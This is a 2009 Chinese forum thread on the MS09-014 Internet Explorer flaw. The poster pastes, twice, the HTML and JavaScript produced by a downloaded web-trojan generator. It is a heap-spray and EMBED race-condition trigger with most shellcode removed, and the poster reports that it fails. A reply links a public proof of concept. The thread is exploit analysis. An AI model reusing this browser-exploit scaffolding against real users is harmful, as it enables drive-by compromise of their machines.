-
-
[讨论]ms09-014
-
发表于: 2009-6-8 17:12
-
这几天ms09-014ie漏洞很热,所以本人也从网上下载一些相关文件来学习一下。
看到网上有一个银狐IE 0DAY网马生成器(Ms09-014)v1.0,随即下载它,想要测试一把。
使用生成器生成htm文件后,测试结果显示不成功。首先显示的是htm文件中的JavaScript语法错误。
在第十七行由于asMimeTypes不是数组,因此asMimeTypes.shift()调用失败。
那既然调用失败,那还溢出个什么。那这个什么网马生成器就是骗人的,只是用来宣传自己网站的。
还是小弟实在是技术浅薄,识别不出大师的精要。请大家讨论下。
下面是生成的htm文件中的内容,shellcode已经大部分删除,只剩开头的%u9090%u9090%ucccc%ue1d9
<BODY onload=go()></BODY>
<SCRIPT>
var asMimeTypes=unescape("%u9090%u9090%ucccc%ue1d9");
var svfox = unescape("%u9090%u9090");
while(svfox.length < 0x40000) { svfox += svfox; }
memory = new Array();
for(i = 0; i < 200; i++)
memory[i] = svfox + asMimeTypes;
function go() {
document.body.innerHTML = "Testing mime type " + asMimeTypes[0] + "...<embed type='" + asMimeTypes.shift() + "'></embed>";
setTimeout(go, 1);
}
</SCRIPT>
看到网上有一个银狐IE 0DAY网马生成器(Ms09-014)v1.0,随即下载它,想要测试一把。
使用生成器生成htm文件后,测试结果显示不成功。首先显示的是htm文件中的JavaScript语法错误。
在第十七行由于asMimeTypes不是数组,因此asMimeTypes.shift()调用失败。
那既然调用失败,那还溢出个什么。那这个什么网马生成器就是骗人的,只是用来宣传自己网站的。
还是小弟实在是技术浅薄,识别不出大师的精要。请大家讨论下。
下面是生成的htm文件中的内容,shellcode已经大部分删除,只剩开头的%u9090%u9090%ucccc%ue1d9
<BODY onload=go()></BODY>
<SCRIPT>
var asMimeTypes=unescape("%u9090%u9090%ucccc%ue1d9");
var svfox = unescape("%u9090%u9090");
while(svfox.length < 0x40000) { svfox += svfox; }
memory = new Array();
for(i = 0; i < 200; i++)
memory[i] = svfox + asMimeTypes;
function go() {
document.body.innerHTML = "Testing mime type " + asMimeTypes[0] + "...<embed type='" + asMimeTypes.shift() + "'></embed>";
setTimeout(go, 1);
}
</SCRIPT>
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
|
|
给个 milw0rm 公布的测试代码,asMimeTypes.shift() 这个执行到没什么问题,不过我IE6/IE7下测试都没看出什么毛病
 MS09-014: MSIE EMBED element race condition memory corruption 在线测试地址:http://www.milw0rm.com/exploit.php?id=8479 (注意关掉弹出窗口过滤) |
|
|
|
|
|
|
|
|
|
|
|
|
